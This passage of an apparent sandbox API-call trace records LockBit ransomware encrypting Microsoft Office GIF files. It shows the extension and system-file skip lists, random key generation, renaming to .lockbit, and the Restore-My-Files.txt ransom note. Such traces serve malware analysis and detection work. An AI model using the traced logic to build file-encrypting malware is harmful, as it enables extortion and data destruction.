Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF") returned=".GIF" [0203.309] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.309] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.309] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.310] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.310] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.310] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF.lockbit") returned 78 [0203.310] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14691_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.311] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.311] malloc (_Size=0x40068) returned 0x3df0008 [0203.311] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=185) returned 1 [0203.311] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.312] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.312] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.315] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.315] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.315] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.315] free (_Block=0x1fa2ed8) [0203.315] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14691_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.315] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.315] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.315] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4248700, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc4248700, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xb1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14692_.GIF", cAlternateFileName="")) returned 1 [0203.316] lstrcmpiW (lpString1=".", lpString2="BD14692_.GIF") returned -1 [0203.316] lstrcmpiW (lpString1="..", lpString2="BD14692_.GIF") returned -1 [0203.316] PathFindExtensionW (pszPath="BD14692_.GIF") returned=".GIF" [0203.316] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.316] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.316] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14692_.GIF") returned 1 [0203.317] lstrcmpiW (lpString1="ntldr", lpString2="BD14692_.GIF") returned 1 [0203.317] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14692_.GIF") returned 1 [0203.317] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14692_.GIF") returned 1 [0203.317] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14692_.GIF") returned -1 [0203.317] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14692_.GIF") returned 1 [0203.317] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14692_.GIF") returned 1 [0203.317] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.317] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF") returned=".GIF" [0203.317] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.317] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.317] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.318] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.318] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.318] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.318] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.318] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.318] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.318] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF.lockbit") returned 78 [0203.318] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14692_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.319] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.320] malloc (_Size=0x40068) returned 0x3df0008 [0203.320] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=177) returned 1 [0203.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.320] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.320] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.320] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.324] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.324] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.324] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.324] free (_Block=0x1fa2ed8) [0203.324] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14692_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.324] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.324] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc555b400, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xc555b400, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0xad, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14693_.GIF", cAlternateFileName="")) returned 1 [0203.324] lstrcmpiW (lpString1=".", lpString2="BD14693_.GIF") returned -1 [0203.324] lstrcmpiW (lpString1="..", lpString2="BD14693_.GIF") returned -1 [0203.324] PathFindExtensionW (pszPath="BD14693_.GIF") returned=".GIF" [0203.324] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0203.324] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0203.324] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0203.325] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0203.325] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14693_.GIF") returned 1 [0203.325] lstrcmpiW (lpString1="ntldr", lpString2="BD14693_.GIF") returned 1 [0203.326] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14693_.GIF") returned 1 [0203.326] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14693_.GIF") returned 1 [0203.326] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14693_.GIF") returned -1 [0203.326] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14693_.GIF") returned 1 [0203.326] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14693_.GIF") returned 1 [0203.326] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\") returned="" [0203.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF") returned=".GIF" [0203.326] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0203.326] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0203.326] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0203.327] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF.lockbit") returned 78 [0203.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14693_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0203.328] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0203.328] malloc (_Size=0x40068) returned 0x3df0008 [0203.328] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=173) returned 1 [0203.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0203.328] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.328] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.328] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0203.328] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0203.332] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0203.332] malloc (_Size=0xb2) returned 0x1fa2ed8 [0203.332] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0203.332] free (_Block=0x1fa2ed8) [0203.332] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14693_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS") returned 1 [0203.332] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt") returned 78 [0203.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0203.332] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecac8100, ftCreationTime.dwHighDateTime=0x1bd8f91, ftLastAccessTime.dwLowDateTime=0xbc978460, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xecac8100, ftLastWriteTime.dwHighDateTime=0x1bd8f91, nFileSizeHigh=0x0, nFileSizeLow=0x29b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14752_.GIF", cAlternateFileName="")) returned 1 [0203.332] lstrcmpiW (lpString1=".", lpString2="BD14752_.GIF") returned -1 [0203.332] 